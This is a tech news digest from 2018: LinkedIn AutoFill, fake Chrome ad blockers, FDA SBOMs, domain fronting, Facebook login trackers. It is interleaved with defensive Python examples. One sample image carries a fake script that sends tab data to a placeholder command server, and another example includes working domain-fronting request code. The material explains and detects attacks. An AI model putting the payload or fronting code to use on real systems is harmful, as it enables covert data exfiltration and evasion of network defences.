Security

LinkedIn's AutoFill Plugin Could Leak User Data, Secret Fix Failed (techcrunch.com)

TechCrunch reports a flaw in LinkedIn's AutoFill plugin that could have allowed hackers to steal your full name, phone number, email address, location (ZIP code), company, and job title. "Malicious sites have been able to invisibly render the plugin on their entire page so if users who are logged into LinkedIn click anywhere, they'd effectively be hitting a hidden 'AutoFill with LinkedIn' button and giving up their data." From the report: Researcher Jack Cable discovered the issue on April 9th, 2018 and immediately disclosed it to LinkedIn. The company issued a fix on April 10th but didn't inform the public of the issue. Cable quickly informed LinkedIn that its fix, which restricted the use of its AutoFill feature to whitelisted sites that pay LinkedIn to host their ads, still left it open to abuse. If any of those sites have cross-site scripting vulnerabilities, which Cable confirmed some do, hackers can still run AutoFill on their sites by installing an iframe to the vulnerable whitelisted site. He got no response from LinkedIn over the last 9 days, so Cable reached out to TechCrunch. A LinkedIn spokesperson issued this statement to TechCrunch: "We immediately prevented unauthorized use of this feature, once we were made aware of the issue. We are now pushing another fix that will address potential additional abuse cases and it will be in place shortly. While we've seen no signs of abuse, we're constantly working to ensure our members' data stays protected. We appreciate the researcher responsibly reporting this and our security team will continue to stay in touch with them. For clarity, LinkedIn AutoFill is not broadly available and only works on whitelisted domains for approved advertisers. It allows visitors to a website to choose to pre-populate a form with information from their LinkedIn profile."
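The attack above only works because the plugin's page could be put in an iframe by any site, and the first fix amounted to an allowlist of embedding origins. The following is an added example, not LinkedIn's code: it implements the decision a browser makes for the two standard anti-framing controls (a Content-Security-Policy frame-ancestors directive, and the older X-Frame-Options header) and then runs it over a constructed scenario with a widget origin, one allowlisted partner and one attacker site. The hostnames and header values are placeholders. The last case in demo() is the caveat Cable raised: an allowlist is evaluated on the embedding origin, so script injected into an allowlisted site frames the widget from an allowed origin and passes the check.

```python
from urllib.parse import urlsplit


def _origin_parts(origin):
    """Split 'https://host[:port]' into (scheme, host, port), filling in the default port."""
    parts = urlsplit(origin)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return parts.scheme.lower(), parts.hostname.lower(), port


def _source_matches(source, embedder, self_origin):
    """Match one frame-ancestors source expression against the embedder origin.

    Covers 'none', 'self', '*', scheme sources (https:) and host sources with an
    optional scheme, '*.' host wildcard and port. A scheme-less host source is
    treated as matching any scheme, which is slightly looser than CSP3.
    """
    source = source.strip().lower()
    e_scheme, e_host, e_port = _origin_parts(embedder)
    if source == "'none'":
        return False
    if source == "'self'":
        return _origin_parts(self_origin) == (e_scheme, e_host, e_port)
    if source == "*":
        return True
    if source.endswith(":") and "://" not in source:          # scheme source, e.g. https:
        return source[:-1] == e_scheme
    if "://" in source:
        scheme, rest = source.split("://", 1)
        if scheme != e_scheme:
            return False
    else:
        rest = source
    host, _, port = rest.partition(":")
    if port == "":
        if e_port not in (80, 443):                           # omitted port means the default port
            return False
    elif port != "*" and int(port) != e_port:
        return False
    if host.startswith("*."):
        return e_host.endswith(host[1:])                      # *.example.com does not match example.com
    return host == e_host


def framing_allowed(headers, embedder, self_origin):
    """Return True if a page served with `headers` may be framed by `embedder`.

    As in current browsers, a Content-Security-Policy frame-ancestors directive
    wins; X-Frame-Options is consulted only when no such directive exists. With
    neither header, any origin can frame the page, which is what lets an
    attacker's page render a widget invisibly and capture clicks meant for it.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    for directive in lower.get("content-security-policy", "").split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            return any(_source_matches(s, embedder, self_origin) for s in value.split())
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _origin_parts(self_origin) == _origin_parts(embedder)
    return True    # no header, or the obsolete ALLOW-FROM, which browsers ignore


def demo():
    """Constructed scenario (placeholder hosts): a widget origin, one allowlisted partner, one attacker."""
    widget = "https://widget.example"
    partner = "https://partner.example"
    attacker = "https://evil.example"
    unprotected = {}
    allowlist = {"Content-Security-Policy":
                 "frame-ancestors 'self' https://partner.example https://*.partner.example"}
    return {
        "unprotected_attacker": framing_allowed(unprotected, attacker, widget),
        "allowlist_attacker": framing_allowed(allowlist, attacker, widget),
        # XSS on partner.example still ends up here: the embedding origin is the allowlisted one
        "allowlist_partner": framing_allowed(allowlist, partner, widget),
    }


if __name__ == "__main__":
    for case, allowed in demo().items():
        print("%-22s frameable=%s" % (case, allowed))
```

Run it as a script to see the three outcomes. The practical check for a site embedding a third-party widget is therefore twofold: the widget's responses must carry a frame-ancestors allowlist (or DENY where embedding is not intended), and every allowlisted origin must itself be free of script injection, because the allowlist cannot tell the partner's own code from an attacker's.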
Chrome

Millions of Chrome Users Have Installed Malware Posing as Ad Blockers (vice.com)

Kaleigh Rogers, writing for Motherboard: Andrey Meshkov, the cofounder of ad-blocker AdGuard, recently got curious about the number of knock-off ad blocking extensions available for Google's popular browser Chrome. These extensions were deliberately styled to look like legitimate, well-known ad blockers, but Meshkov wondered why they existed at all, so he downloaded one and took a look at the code. "Basically I downloaded it and checked what requests the extension was making," Meshkov told me over the phone. "Some strange requests caught my attention."

Meshkov discovered that the AdRemover extension for Chrome -- which had over 10 million users -- had code hidden inside an image that was loaded from the remote command server, giving the extension creator the ability to change its functions without updating. This alone is against Google's policy, and after Meshkov wrote about a few examples on AdGuard's blog, many of which had millions of downloads, Chrome removed the extensions from the store. I reached out to Google, and a spokesperson confirmed that these extensions had been removed.
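The report says the extension's remote-control code was "hidden inside an image" fetched from a command server, but not how. An added example follows, not AdGuard's analysis code: it assumes one common smuggling technique, appending the payload after the PNG's final IEND chunk, which every image decoder ignores. It builds a constructed 1x1 PNG, appends a fake script to a copy, and shows a checker that walks the chunk structure, verifies each CRC and reports whatever follows IEND. The payload and the c2 hostname in it are placeholders.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype, data):
    """Serialize one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_minimal_png():
    """A valid 1x1 8-bit grayscale PNG, built here as constructed sample input."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, colour type, ...
    idat = zlib.compress(b"\x00\x00")                     # one scanline: filter byte + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def parse_chunks(blob):
    """Walk the chunk list up to IEND, verifying each CRC.

    Returns (chunks, end_offset) where end_offset is the first byte after IEND.
    Raises ValueError if the file is not a well-formed PNG.
    """
    if not blob.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIGNATURE), []
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        if pos + 12 + length > len(blob):
            raise ValueError("truncated chunk %r at offset %d" % (ctype, pos))
        data = blob[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC on chunk %r at offset %d" % (ctype, pos))
        chunks.append((ctype, data))
        pos += 12 + length
        if ctype == b"IEND":
            return chunks, pos
    raise ValueError("no IEND chunk found")


def trailing_payload(blob):
    """Bytes appended after IEND; decoders ignore them, which is why smugglers use the spot."""
    _, end = parse_chunks(blob)
    return blob[end:]


def looks_like_script(payload):
    """Cheap triage heuristic: decodable text carrying JavaScript-ish tokens."""
    try:
        text = payload.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return any(tok in text for tok in ("function", "eval(", "chrome.", "XMLHttpRequest", "fetch("))


def inspect_image(blob):
    """Summarise an image: chunk types seen and whether a script-like trailer follows IEND."""
    chunks, _ = parse_chunks(blob)
    extra = trailing_payload(blob)
    return {
        "chunks": [c[0].decode("ascii") for c in chunks],
        "trailing_bytes": len(extra),
        "script_like": looks_like_script(extra),
    }


# Constructed sample: a clean image and the same image with a fake remote-control script appended.
CLEAN_PNG = make_minimal_png()
FAKE_PAYLOAD = b"(function(){chrome.tabs.query({},function(t){fetch('https://c2.example/'+t.length)})})();"
TAINTED_PNG = CLEAN_PNG + FAKE_PAYLOAD

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_PNG), ("tainted", TAINTED_PNG)):
        print(name, inspect_image(blob))
```

Two caveats. Trailing data is only one hiding place; a payload encoded in pixel values or in an ancillary chunk such as tEXt passes this check, so the image alone is never the whole story. The decisive evidence is in the extension's own JavaScript: where it fetches the image, how it transforms the response, and whether the result reaches eval, Function or a script element, since that is the remote-code behaviour the Chrome Web Store policy forbids.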

Government

FDA Wants Medical Devices To Have Mandatory Built-In Update Mechanisms (bleepingcomputer.com)

Catalin Cimpanu, writing for BleepingComputer: The US Food & Drug Administration plans to ask Congress for more funding and regulatory powers to improve its approach towards medical device safety, including on the cybersecurity front. An FDA document released this week reveals several of the FDA's plans, including the desire to force device makers to include mandatory update systems inside products for the purpose of delivering critical security patches.

In addition, the FDA also plans to force device makers to create a document called "Software Bill of Materials" that will be provided for each medical device and will include software-related details for each product. Hospitals, healthcare units, contractors, or users will be able to consult the medical device's bill of materials and determine how it functions, what software is needed for what feature, and what technologies are used in each device.
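What a hospital or integrator would actually do with such a bill of materials is match it against vulnerability advisories. The following is an added example, not FDA or vendor code: it assumes the SBOM is a CycloneDX JSON document (bomFormat plus a components list with name and version) and compares each component with a constructed advisory feed that records the first fixed version per package. The device, its component versions and the ADV-000x identifiers are placeholders, not real advisories.

```python
import json

# Constructed CycloneDX-style SBOM for a hypothetical device; names and versions are illustrative.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "metadata": {"component": {"type": "device", "name": "pump-controller", "version": "3.2.0"}},
    "components": [
        {"type": "library", "name": "openssl", "version": "1.0.2k"},
        {"type": "library", "name": "busybox", "version": "1.31.1"},
        {"type": "operating-system", "name": "linux-kernel", "version": "4.4.200"},
    ],
})

# Constructed advisory feed: (package name, first fixed version, placeholder advisory id).
SAMPLE_ADVISORIES = [
    ("openssl", "1.0.2u", "ADV-0001 (placeholder)"),
    ("busybox", "1.30.0", "ADV-0002 (placeholder)"),
    ("linux-kernel", "4.4.250", "ADV-0003 (placeholder)"),
]


def parse_version(text):
    """'1.0.2k' -> ((1, ''), (0, ''), (2, 'k')): numeric part as int, letter suffix kept for ordering."""
    parts = []
    for piece in text.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append((int(digits) if digits else 0, piece[len(digits):]))
    return tuple(parts)


def load_components(sbom_text):
    """Return [(name, version)] from a CycloneDX JSON document."""
    doc = json.loads(sbom_text)
    if doc.get("bomFormat") != "CycloneDX":
        raise ValueError("unsupported SBOM format: %r" % doc.get("bomFormat"))
    return [(c["name"], c.get("version", "")) for c in doc.get("components", [])]


def affected_components(sbom_text, advisories):
    """List (name, version, advisory, fixed_in) for every component older than an advisory's fix."""
    fixes = {}
    for pkg, fixed, adv in advisories:
        fixes.setdefault(pkg, []).append((fixed, adv))
    findings = []
    for name, version in load_components(sbom_text):
        for fixed, adv in fixes.get(name, []):
            if parse_version(version) < parse_version(fixed):
                findings.append((name, version, adv, fixed))
    return findings


if __name__ == "__main__":
    for name, version, adv, fixed in affected_components(SAMPLE_SBOM, SAMPLE_ADVISORIES):
        print("%s %s: %s, fixed in %s" % (name, version, adv, fixed))
```

The comparison is deliberately simple and errs toward false positives: vendors often backport a fix without changing the reported version string, so a hit from this check is a question for the manufacturer rather than a confirmed exposure. It also shows why the two FDA proposals belong together: an SBOM is only as good as its last update, and a device with no update mechanism will keep shipping the same stale list.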

Businesses

Netflix Could Start Buying Movie Theaters to Help Films Gain a Boost in Oscar Race, Report Says (indiewire.com)

Netflix has made a strong effort to land Oscar nominations since debuting its first original feature, "Beasts of No Nation," in 2015. The next step in the streaming giant's plan to secure film awards could be to buy and own movie theaters. IndieWire: A new report from the Los Angeles Times says Netflix is considering buying theaters in Los Angeles and New York in order to gain a boost during Oscar season. People familiar with the situation say the theaters would be used to give greater exposure to the feature and documentary titles Netflix is hoping to push into the awards race. According to the Times, Netflix executives originally considered purchasing the Los Angeles-based Landmark Theaters, which is co-owned by Mark Cuban. The theaters are well known for attracting awards voters by running first-run features, documentaries, and foreign films during Oscar season. Sources close to Netflix confirm the company has no current plans to buy Landmark properties. Landmark has three Los Angeles locations and 53 theaters overall in the U.S.
United States

The Higher Your Salary, the More Time Your Employer Will Pay You Not To Work (qz.com)

The best-paid workers in the US not only make more money than many of their colleagues, they also tend to get more paid vacation days. An anonymous reader shares a report: An annual survey of employee benefits conducted by the US government shows that, in 2017, nearly half of the people in the top 25% of earners received at least 10 days of paid vacation. The bottom 25% was not so lucky -- only around a tenth of them received such generous leave. Paid vacation time is often overlooked in measures of pay inequality in the US, because the value of time off does not appear in the household income statistics.
Businesses

Pasta Is Good For You, Say Scientists Funded By Big Pasta (buzzfeed.com)

Earlier this month, numerous news outlets reported on a study which concludes that eating pasta is good for health. In fact, the reports claimed, eating pasta could help you lose weight. Except, there is more to the story. BuzzFeed News reports: What those and many other stories failed to note, however, was that three of the scientists behind the study in question had financial conflicts as tangled as a bowl of spaghetti, including ties to the world's largest pasta company, the Barilla Group. Over the last decade or so, with the rise of the Atkins, South Beach, paleo, and ketogenic diets, Big Pasta has battled a societal shift against carbohydrates -- and funded and promoted research suggesting that noodles are good for you.

At least 10 peer-reviewed studies about pasta published since 2008 were either funded directly by Barilla or, like the one published this month, were carried out by scientists who have had financial ties to the company, which reported sales of 3.4 billion euros ($4.2 billion) in 2016. For two years, Barilla has publicized some of these studies, plus others favorable to its product, on its website with taglines like "Eat Smart Be Smart...With Pasta" and "More Evidence Pasta Is Good For You." And the company hired the large public relations firm Edelman to push the latest study's findings to journalists.

Microsoft

Microsoft Has Run Out of Windows Phone Stock (venturebeat.com)

Even if you really wanted to buy a Windows phone, Microsoft has run out of Windows Phone devices to sell to you. From a report: I've been watching the number of Windows Phone options on the Microsoft Store website dwindle for over two years now. I was honestly expecting them to disappear completely more than six months ago. It's 2018, and there are still two remaining phones. Last night, they both flipped over to "out of stock." The HP Elite x3 with dock, normally $799 but on sale for $299, and the Alcatel Idol 4S, normally $299 but on sale for $99.99, are officially out of stock. The third option for $169, the Alcatel Idol 4S with VR Goggles, is of course also out of stock.
Google

Turn Right at the Burger King: Google Maps Begins Using Landmarks To Help With Guidance (techcrunch.com)

Most navigation apps give you instructions based on street names or distances. That is arguably at odds with how people usually give directions, which often lean on landmarks that are easier to spot. Google sees some merit in that: Google Maps is now highlighting landmarks and other points of interest, such as fast food restaurants, to help with guidance. TechCrunch reports that some users are already seeing this in Google Maps. And for Google, this may open the door to some business opportunities as well. Only time will tell.
Businesses

Marissa Mayer is Back (bloomberg.com)

Former Yahoo Chief Executive Officer Marissa Mayer is starting a technology business incubator, Lumi Labs, with longtime colleague Enrique Munoz Torres, she revealed in an interview with The New York Times. Bloomberg: The venture will focus on consumer media and artificial intelligence, according to the company's website, which is set against a backdrop of snow-covered peaks. Lumi means snow in Finnish, Mayer told the New York Times, which reported the news earlier Wednesday. The next project for Mayer, who was an early employee at Google and worked there until leaving to run Yahoo in 2012, had been a matter of considerable speculation in Silicon Valley. She left Yahoo, once a leading search engine and web destination, after it was sold to Verizon Communications last year.
The Internet

4.9% of Websites Use Flash, Down From 28.5% in 2011 (bleepingcomputer.com)

Web makers continue to ditch the infamous Flash for other safer, improved technologies. In 2011, more than 28.5 percent of websites used Flash in their code, a figure technology survey site W3Techs estimates to have dropped to 4.9 percent today. BleepingComputer: The number confirms Flash's decline, and a reason why Adobe has decided to retire the technology at the end of 2020. A decline from 28.5 percent to 4.9 percent doesn't look that bad, but we're talking about all Internet sites, not just a small portion of Top 10,000 or Top 1 Million sites. Taking into account the sheer number of abandoned sites on today's Internet, the decline is quite considerable, and W3Techs' findings confirm similar statistics put out by a Google security engineer in February.
Businesses

Finland Is Killing Its Basic Income Experiment (businessinsider.com)

tomhath shares a report: Since the beginning of last year, 2000 Finns have been getting money from the government each month -- and they are not expected to do anything in return. The participants, aged 25-58, are all unemployed, and were selected at random by Kela, Finland's social-security institution. Instead of unemployment benefits, the participants now receive $690 per month, tax free. Should they find a job during the two-year trial, they still get to keep the money. While the project is praised internationally for being at the cutting edge of social welfare, back in Finland, decision makers are quietly pulling the brakes, making a U-turn that is taking the project in a whole new direction. "Right now, the government is making changes that are taking the system further away from a basic income," Kela researcher Miska Simanainen told the Swedish daily Svenska Dagbladet.
Technology

'Increasingly, People in Silicon Valley Are Losing Touch With Reality' (500ish.com)

Longtime commentator MG Siegler writes: You can see it in the tweets. You can hear it at tech conferences. Hell, you can hear it at most cafes in San Francisco on any given day. People -- really smart people -- saying some of the most vacuous things. Words that if they were able to take a step outside of their own heads and hear, they'd be embarrassed by. Or, at least, these are stances, thoughts, and ideas that these people should be embarrassed by. But they're clearly not because they keep saying them. This isn't only about Facebook -- far from it. That's just the most high profile and timely example of a company suffering from some of this. And in that case, it's really more in their responses to the Cambridge Analytica situation, rather than the situation itself (which is another matter, though undoubtedly related). They don't know the right things to say because they don't know what to say, period. Because they've slipped out of touch.

But again, I feel like this is increasingly everywhere I look around tech. It's an industry filled with some of the most brilliant people in the world, which makes it all the more disappointing. I won't name names but also because I don't have to. I'd wager everyone reading this will have clear and obvious examples of what I'm talking about in their own circles -- even if only in their own virtual circles. This is everywhere. I don't know the cause of this. Perhaps we can blame part of it on Trump, even if only indirectly (a man who has gotten ahead in life by saying asinine things). If I had to guess, I'd say the root is an increasing sense of entitlement as the tech industry has grown in stature to become the most important from a fiscal perspective and arguably from a cultural perspective as well.

EU

Facebook To Put 1.5 Billion Users Out of Reach of New EU Privacy Law (reuters.com)

An anonymous reader quotes a report from Reuters: If a new European law restricting what companies can do with people's online data went into effect tomorrow, almost 1.9 billion Facebook users around the world would be protected by it. The online social network is making changes that ensure the number will be much smaller. Facebook members outside the United States and Canada, whether they know it or not, are currently governed by terms of service agreed with the company's international headquarters in Ireland. Next month, Facebook is planning to make that the case for only European users, meaning 1.5 billion members in Africa, Asia, Australia and Latin America will not fall under the European Union's General Data Protection Regulation (GDPR), which takes effect on May 25. That removes a huge potential liability for Facebook, as the new EU law allows for fines of up to 4 percent of global annual revenue for infractions, which in Facebook's case could mean billions of dollars.
Businesses

Jeff Bezos Reveals That Amazon Has Over 100 Million Prime Subscribers (theverge.com)

Amazon CEO Jeff Bezos revealed today that the company has over 100 million Prime members, "marking the first time in the 13-year history of Amazon offering its Prime membership that the company has ever revealed its number of subscribers," reports The Verge. From the report: According to Bezos, Amazon Prime also saw its best year ever in 2017, with the company shipping over five billion products with Prime and signing up more new members than in any previous year. Also revealed today, Whole Foods Market will discontinue its rewards program on May 2 and fold it into Amazon Prime. "Stay tuned for additional announcements for Amazon Prime members," reads the Whole Foods FAQ page focused on digital coupons, rewards and online accounts. "Any account benefits, including membership and/or unused rewards, will not roll into any future programs."
Robotics

Scientists Create Robots That Can Assemble IKEA Furniture For You (sciencemag.org)

sciencehabit shares a report from Science Magazine: Although artificial intelligence systems may be able to beat humans at board games, we still have the upper hand when it comes to complicated manual tasks. But now, scientists have created robots that can do something even most humans struggle with: assemble an IKEA chair. Putting together a chair requires a combination of complex movements that, in turn, depends on such skills as vision, limb coordination, and the ability to control force. Until now, that was too much to ask of even a sophisticated robot. But researchers have finally broken the dexterity barrier by combining commercially available hardware, including 3D cameras and force sensors, to build two chair-building bots. To construct their IKEA masterpiece, the robots first took pictures to identify each part of the chair. An algorithm planned the motions the robots needed to manipulate the objects without causing any collisions; two robotic arms then performed those actions in concert. Feedback from force sensors also helped: When the robot needed to insert a pin into a hole, for example, it would slide the pin over the surface until it felt a change in force. The robots were able to put together the chair in a little over 20 minutes, which includes the 11 minutes and 21 seconds of planning time and 8 minutes and 55 seconds of actual assembly. The findings have been reported today in Science Robotics.
Transportation

Autonomous Boats Will Be On the Market Sooner Than Self-Driving Cars (vice.com)

An anonymous reader quotes a report from Motherboard: In the autonomous revolution that is underway, nearly every transportation machine will eventually be self-driving. For cars, it's likely going to take decades before we see them operating freely, outside of test conditions. Some unmanned watercraft, on the other hand, may be at sea commercially before 2020. That's partly because automating all ships could generate a ridiculous amount of revenue. According to the United Nations, 90 percent of the world's trade is carried by sea and 10.3 billion tons of products were shipped in 2016. According to NOAA's National Ocean Service, ships transported $1.5 trillion worth of cargo through U.S. ports in 2016. The world's 325 or so deep-sea shipping companies have a combined revenue of $10 billion.

Startups and major firms like Rolls Royce are now looking to automate the seas and help maritime companies ease navigation, save fuel, improve safety, increase tonnage, and make more money. As it turns out, autonomous systems for boats aren't supremely different from those of cars, beyond a few key factors -- for instance, water is always moving while roads are not, and ships need at least a couple miles to redirect. Buffalo Automation, a startup in upstate New York that began at the University at Buffalo, just raised $900,000 to help commercialize its AutoMate system -- essentially a collection of sensors and cameras to help boats operate semi-autonomously. CEO Thiru Vikram said the company is working with three pilot partners, and intends to target cargo ships and recreational vessels first. Autonomous ships are an area of particular interest for the International Maritime Organization (IMO), which sets the standards for international waters. It launched a regulatory scoping exercise last year to analyze the impact of autonomous boats. By the time it wraps in 2020, market demand may make it so that we already have semi-autonomous and unmanned vessels at sea.

Science

MIT Discovers Way To Mass-Produce Graphene In Large Sheets (inhabitat.com)

New submitter Paige.Bennett writes: Up till now, graphene has been produced in small batches in labs. But MIT just found a way to mass-produce graphene in large sheets using a process that rolls out five centimeters of graphene each minute. The longest span so far was nearly four hours, which produced about 10 meters of graphene. According to MIT, here's how their conveyor belt system works: "The first spool unfurls a long strip of copper foil, less than one centimeter wide. When it enters the furnace, the foil is fed through first one tube and then another, in a 'split-zone' design. While the foil rolls through the first tube, it heats up to a certain ideal temperature, at which point it is ready to roll through the second tube, where the scientists pump in a specified ratio of methane and hydrogen gas, which are deposited onto the heated foil to produce graphene." The work has been published in the journal Materials and Interfaces.
Bitcoin

German ICO Savedroid Pulls Exit Scam After Raising $50 Million (techcrunch.com)

German company Savedroid has pulled a classic exit scam after raising $50 million in ICO and direct funding. The site is currently displaying a South Park meme with the caption "Aannnd it's gone." The founder, Dr. Yassin Hankir, has posted a tweet thanking investors and saying "Over and out." TechCrunch reports: A reverse image search found Hankir's photo on this page for Founder Institute, and he has pitched his product at multiple events, including this one in German. Savedroid was originally supposed to use AI to manage user investments and promised a crypto-backed credit card, a claim that CCN notes is popular with scam ICOs. It ran for a number of months and was clearly well-managed as the group was able to open an office and appear at multiple events.
Censorship

Google Is Shuttering Domain Fronting, Creating a Big Problem For Anti-Censorship Tools (theverge.com)

"The Google App Engine is discontinuing a practice called domain fronting, which lets services use Google's network to get around state-level internet blocks," reports The Verge. While the move makes sense from a cybersecurity perspective, since domain fronting is also widely used by malware to evade network-based detection, it will likely frustrate app developers who use it to get around internet censorship. From the report: First spotted by Tor developers on April 13th, the change has been rolling out across Google services and threatens to disrupt services for a number of anti-censorship tools, including Signal, GreatFire.org and Psiphon's VPN services. Reached by The Verge, Google said the changes were the result of a long-planned network update. "Domain fronting has never been a supported feature at Google," a company representative said, "but until recently it worked because of a quirk of our software stack. We're constantly evolving our network, and as part of a planned software update, domain fronting no longer works. We don't have any plans to offer it as a feature."

Domain-fronting allowed developers to use Google as a proxy, forwarding traffic to their own servers through a Google.com domain. That was particularly important for evading state-level censorship, which might try to block all the traffic sent to a given service. As long as the service was using domain-fronting, all the in-country data requests would appear as if they were headed for Google.com, with encryption preventing censors from digging any deeper.
We do not yet know exactly why and when Google is shutting down the practice, but will update this post once we learn more.
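The mechanism the report describes rests on two layers naming different hosts: the name the network can see (DNS and the TLS SNI extension) is the front, and the real destination sits in the HTTP Host header inside the encrypted stream. The following is an added example, not Google's, Tor's or Signal's code, that makes the two layers explicit and shows the one-line policy a provider's edge can apply to end the practice, which is the same comparison a defender doing TLS inspection would log to spot malware using it. The front is www.google.com as in the report; the hidden hostname is a placeholder. open_fronted() is included so the request is shown end to end, but it needs network access and is never called here.

```python
import socket
import ssl


def build_fronted_request(front, hidden_host, path="/"):
    """Return (sni_name, http_request_bytes) for a fronted GET.

    `front` is the name put in DNS and the TLS SNI extension, so it is all a
    passive observer learns; `hidden_host` goes in the Host header inside TLS.
    """
    request = (
        "GET %s HTTP/1.1\r\n"
        "Host: %s\r\n"
        "Connection: close\r\n"
        "\r\n" % (path, hidden_host)
    ).encode("ascii")
    return front, request


def open_fronted(front, hidden_host, path="/"):
    """Send the request for real (needs network access; not exercised offline)."""
    sni, request = build_fronted_request(front, hidden_host, path)
    ctx = ssl.create_default_context()
    with socket.create_connection((front, 443)) as raw:
        with ctx.wrap_socket(raw, server_hostname=sni) as tls:
            tls.sendall(request)
            return tls.recv(4096)


def parse_host_header(request):
    """Pull the Host header out of a raw HTTP/1.1 request (None if absent)."""
    head = request.decode("ascii").split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            return value.strip().lower()
    return None


def edge_allows(sni, request):
    """The rule a provider's edge applies to end fronting: Host must name the same host as SNI.

    Providers that host many customers behind one front usually allow Host to
    be any hostname the SNI name's tenant owns rather than an exact match; the
    exact-match form is the simplest policy that still closes the technique.
    """
    host = parse_host_header(request)
    return host is not None and host == sni.lower()


def observer_views(front, hidden_host):
    """Contrast what the network sees with where the provider actually routes the request."""
    sni, request = build_fronted_request(front, hidden_host)
    return {"network_sees": sni, "provider_routes_to": parse_host_header(request)}


if __name__ == "__main__":
    sni, req = build_fronted_request("www.google.com", "hidden-service.appspot.com", "/poll")
    print(observer_views("www.google.com", "hidden-service.appspot.com"))
    print("edge accepts fronted request:", edge_allows(sni, req))
```

The asymmetry is the whole point: a censor on the path sees only the SNI name and has to block all of Google to stop the hidden service, while the provider terminating TLS sees both names and can refuse the mismatch at any time. That is why the technique depends entirely on the front's goodwill, and why Google's "quirk of our software stack" could be closed with a routine update.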
Facebook

'Login With Facebook' Data Hijacked By JavaScript Trackers (techcrunch.com)

An anonymous reader quotes a report from TechCrunch: Facebook confirms to TechCrunch that it's investigating a security research report that shows Facebook user data can be grabbed by third-party JavaScript trackers embedded on websites using Login With Facebook. The exploit lets these trackers gather a user's data including name, email address, age range, gender, locale, and profile photo depending on what users originally provided to the website. It's unclear what these trackers do with the data, but many of their parent companies including Tealium, AudienceStream, Lytics, and ProPS sell publisher monetization services based on collected user data. The abusive scripts were found on 434 of the top 1 million websites including freelancer site Fiverr.com, camera seller B&H Photo And Video, and cloud database provider MongoDB. That's according to Steven Englehardt and his colleagues at Freedom To Tinker, which is hosted by Princeton's Center For Information Technology Policy.
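The underlying problem is that every script a page loads runs with the page's full JavaScript privileges, so a third-party tracker on a page that has initialised the Facebook SDK can call the same SDK methods as the site itself. An added example follows, not the Freedom To Tinker crawler: a small audit that parses a page's HTML, classifies each script by origin and lists the third-party script hosts that would be co-resident with the SDK. The sample page is constructed, and every hostname in it other than connect.facebook.net is a placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

FACEBOOK_SDK_HOST = "connect.facebook.net"


class ScriptCollector(HTMLParser):
    """Record the src of every <script> tag and count inline scripts."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self.inline += 1


def site_of(host):
    """Crude registrable domain (last two labels); production code should use the public suffix list."""
    return ".".join(host.lower().split(".")[-2:])


def audit_scripts(page_url, markup):
    """Classify the page's scripts: is the Facebook SDK loaded, and which other origins run alongside it."""
    collector = ScriptCollector()
    collector.feed(markup)
    first_party = site_of(urlsplit(page_url).hostname)
    sdk_present, third_party = False, set()
    for src in collector.srcs:
        host = urlsplit(urljoin(page_url, src)).hostname   # resolves relative and protocol-relative URLs
        if host is None:
            continue
        if host.lower() == FACEBOOK_SDK_HOST:
            sdk_present = True
        elif site_of(host) != first_party:
            third_party.add(host.lower())
    return {"sdk_present": sdk_present, "third_party": sorted(third_party), "inline_scripts": collector.inline}


def exposed_trackers(page_url, markup):
    """Third-party script hosts that share a page with the SDK, i.e. can call FB.* exactly as the site does."""
    report = audit_scripts(page_url, markup)
    return report["third_party"] if report["sdk_present"] else []


# Constructed sample page; hostnames other than connect.facebook.net are placeholders.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script async defer src="https://connect.facebook.net/en_US/sdk.js"></script>
<script src="https://cdn.tracker.example/tag.js"></script>
<script src="//metrics.another.example/collect.js"></script>
<script>window.fbAsyncInit = function () { FB.init({appId: '000000'}); };</script>
</head><body><div class="fb-login-button"></div></body></html>"""

if __name__ == "__main__":
    print(audit_scripts("https://shop.example/login", SAMPLE_PAGE))
```

A non-empty result from exposed_trackers is the inventory a site owner needs before deciding what to do about it: move the tracker into a sandboxed iframe on its own origin so it no longer shares the page's JavaScript context, or keep untrusted scripts off the pages where the SDK is initialised. The check is static and inline scripts are only counted, so a tag manager that injects further scripts at run time will hide the real list; a crawl with a real browser, as in the study, is the thorough version.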
